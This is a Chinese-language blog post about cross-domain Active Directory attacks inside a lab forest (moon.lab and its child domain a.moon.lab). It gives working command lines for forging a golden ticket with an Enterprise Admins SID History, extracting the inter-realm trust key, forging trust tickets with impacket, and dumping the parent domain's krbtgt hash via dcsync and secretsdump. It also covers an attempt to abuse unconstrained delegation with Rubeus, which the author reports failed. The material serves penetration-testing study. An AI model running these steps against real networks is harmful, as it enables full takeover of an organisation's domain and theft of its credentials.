<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> 跨域攻击 · 季伯常  Blog</title><meta name="description" content="跨域攻击 - null"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.png"><link rel="stylesheet" href="/css/apollo.css"><link rel="search" type="application/opensearchdescription+xml" href="https://www.jibochang.link/atom.xml" title="季伯常  Blog"><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="季伯常  Blog" type="application/atom+xml">
</head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="/favicon.png" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">BLOG</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">ARCHIVE</a></li><li class="nav-list-item"><a href="/atom.xml" target="_self" class="nav-list-link">RSS</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">跨域攻击</h1><div class="post-info">Jun 22, 2024</div><div class="post-content"><p>前段时间帮几个客户做AD攻击面排查，发现有域林，但跨域攻击还不太会，看网上相关文章也不多，特地记录一下几种攻击方式。</p>
<h2 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h2><p>父域：<code>moon.lab</code>   两个域控 ad-server.moon.lab  &#x3D; 10.10.10.1 certserver.moon.lab &#x3D; 10.10.10.2</p>
<p>子域：<code>a.moob.lab</code> 一个域控 B-AD.a.moon.lab &#x3D; 10.10.10.5</p>
<hr>
<p>目前已经控制了子域的一台机器当做入口点，由于懒得打域控，就直接用域管账号密码，当做是拿下域控后进行操作</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622170613764.png" alt="image-20240622170613764"></p>
<h2 id="黄金票据-SID-History"><a href="#黄金票据-SID-History" class="headerlink" title="黄金票据 + SID History"></a>黄金票据 + SID History</h2><p>要使用黄金票据+<code>SIDHistory</code><strong>必须</strong>要有以下几个条件</p>
<ol>
<li>当前域SID</li>
<li>父域Enterprise Admins账户的SID</li>
<li>当前域<code>krbtgt</code>账户的hash</li>
</ol>
<p>krbtgt的hash通过dcsync去获取就行了</p>
<p>以下演示一下如何获得以上信息，首先是当前域的SID，可以通过<code>adfind</code>、<code>adexplorer</code>获得</p>
<h3 id="查询SID"><a href="#查询SID" class="headerlink" title="查询SID"></a>查询SID</h3><h4 id="ADExplorer"><a href="#ADExplorer" class="headerlink" title="ADExplorer"></a>ADExplorer</h4><p>连接上adexplorer之后点击当前域查看objectSid属性</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622174017426.png" alt="image-20240622174017426"></p>
<p>成功获得sid为<code>S-1-5-21-3630734435-3836532205-689166442</code></p>
<h4 id="Adfind"><a href="#Adfind" class="headerlink" title="Adfind"></a>Adfind</h4><p>使用以下命令指定查询administroatr用户的sid</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adfind.exe -sc u:administrator objectsid</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622174913698.png" alt="image-20240622174913698"></p>
<p>这里查询出两个用户的SID，一个是父域的一个是子域。</p>
<p>而父域的Enterprise Admins用户的SID为父域SID-519即<code>S-1-5-21-4135803656-2414268689-2214011370-519</code></p>
<h3 id="伪造票据"><a href="#伪造票据" class="headerlink" title="伪造票据"></a>伪造票据</h3><p>现在整理一下前面收集的信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">krbtgt hash：1d5267a559913316b91e6e5de976d7b7</span><br><span class="line">子域sid：S-1-5-21-3630734435-3836532205-689166442</span><br><span class="line">Enterprise Admins的SID：S-1-5-21-4135803656-2414268689-2214011370-519</span><br></pre></td></tr></table></figure>

<p>接着伪造黄金票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::golden /user:Administrator /domain:a.moon.lab /sid:S-1-5-21-3630734435-3836532205-689166442 /sids:S-1-5-21-4135803656-2414268689-2214011370-519 /krbtgt:1d5267a559913316b91e6e5de976d7b7 /ptt</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622175624459.png" alt="image-20240622175624459"></p>
<p>接着用dcsync去dump父域的hash测试是否成功</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz lsadump::dcsync /domain:moon.lab /user:moonlab\krbtgt</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622175920265.png" alt="image-20240622175920265"></p>
<p>可以看到成功的导出，说明成功拿到父域权限</p>
<h2 id="inter-realm-key-SID-History"><a href="#inter-realm-key-SID-History" class="headerlink" title="inter-realm key+SID History"></a>inter-realm key+SID History</h2><p>跨域和普通的域认证有所不同，跨域认证需要个 inter-realm key，这个key就在两个信任域当中都存在。获取到 inter-realm key 就能制作访问其他域任意服务的 ST 服务票据了。然后在 ST 服务票据中加上企业管理员的 SID History，就可以以企业管理员权限访问域林中的任意服务。</p>
<hr>
<p>那么该如何拿到这个key呢？只要获得了域林中任意域的域控制器权限，即可通过相关工具查询出key。</p>
<p>以下演示一下如何通过mimikatz和impacket工具获取这个key</p>
<h3 id="获取inter-realm-key"><a href="#获取inter-realm-key" class="headerlink" title="获取inter-realm key"></a>获取inter-realm key</h3><h4 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h4><p>需要在域控上执行以下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz lsadump::turst /patch</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622192809316.png" alt="image-20240622192809316"></p>
<p>需要看从子域到父域的rc4_hmac_nt就是key</p>
<p>正常都知道在域内加了$符号的是机器账户。在域林内就不一样，在users组中带有$符号的就是信任账户，信任账户的ntlmhash就是key，所以我们去获取这个账户的hash即可。有以下两种方式找到这个账户</p>
<h5 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h5><p>使用这句就能查到，但实战中可能环境问题powershell不方便，可以用另外一种方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get-ADUser -filter * -Properties DistinguishedName,samAccountType | ?&#123;$_. name -like &quot;*$&quot;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622193451572.png" alt="image-20240622193451572"></p>
<h5 id="Adfind-1"><a href="#Adfind-1" class="headerlink" title="Adfind"></a>Adfind</h5><p>打开users组就能看到，实战推荐用这个查找</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622193540363.png" alt="image-20240622193540363"></p>
<p>之后通过secretsdump获取hash即可</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622193803977.png" alt="image-20240622193803977"></p>
<h3 id="伪造票据-1"><a href="#伪造票据-1" class="headerlink" title="伪造票据"></a>伪造票据</h3><p>总结一下上面的信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">key hash：f6e0688688a20c4fbc217cc139926300</span><br><span class="line">子域sid：S-1-5-21-3630734435-3836532205-689166442</span><br><span class="line">Enterprise Admins的SID：S-1-5-21-4135803656-2414268689-2214011370-519</span><br></pre></td></tr></table></figure>

<p>然后用ticketer.py去申请个TGT票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 ticketer.py -nthash f6e0688688a20c4fbc217cc139926300 -domain-sid S-1-5-21-3630734435-3836532205-689166442 -extra-sid S-1-5-21-4135803656-2414268689-2214011370-519 -domain a.moon.lab -spn krbtgt/moon.lab administrator</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622194113186.png" alt="image-20240622194113186"></p>
<p>申请完TGT票据需要导入一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export KRB5CCNAME=administrator.ccache</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622194146585.png" alt="image-20240622194146585"></p>
<p>可以用<code>klist -l</code>查看</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622194206891.png" alt="image-20240622194206891"></p>
<p>接着去申请一个父域CIFS的ST票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 getST.py -k -no-pass -spn cifs/ad-server.moon.lab -dc-ip 10.10.10.1 moon.lab/administraotr</span><br></pre></td></tr></table></figure>

<p>这里有个坑，在申请的时候会提示Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)这个就是时间不同步的，只要改一下时间就可以，但是这里得要同步的时间不是父域的时间</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622194428394.png" alt="image-20240622194428394"></p>
<p>这个时间是父域的时间，但是也不太对，后面改成子域的时间就ok了</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622194528869.png" alt="image-20240622194528869"></p>
<p>接着再导入一下ST票据，然后用secretsdump去导出父域的hash，成功导出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 secretsdump.py -no-pass -k a.moon.lab/administrator@ad-server.moon.lab -just-dc-user &quot;moonlab\krbtgt&quot; -dc-ip 10.10.10.1</span><br></pre></td></tr></table></figure>

<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622194725710.png" alt="image-20240622194725710"></p>
<h2 id="非约束委派"><a href="#非约束委派" class="headerlink" title="非约束委派"></a>非约束委派</h2><p>在域控上默认是开非约束委派的，所以当我们拿到子域的域控，就可以利用非约束委派来攻击父域的域控。</p>
<p>要用rubeus进行监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Rubeus.exe monitor /interval:1 /filteruser:AD-SERVER$ /nowrap</span><br></pre></td></tr></table></figure>

<p>接着就用printerbug或者PetitPotam打触发就ok，这里还是没成功，不知道为什么打非约束委派从来没成功过</p>
<p><img src="/2024/06/22/%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB-%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/image-20240622205812668.png" alt="image-20240622205812668"></p>
</div></article></div></main><footer><div class="paginator"><a href="/2024/03/01/%E5%8E%BB%E9%99%A4cobaltstrike%E7%9A%84Yara%E7%AD%BE%E5%90%8D%E7%89%B9%E5%BE%81/" class="next">NEXT</a></div><div class="copyright"><p>© 2024 <a href="https://www.jibochang.link"></a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/pinggod/hexo-theme-apollo" target="_blank">hexo-theme-apollo</a>.</p></div></footer></div><script async src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script></body></html>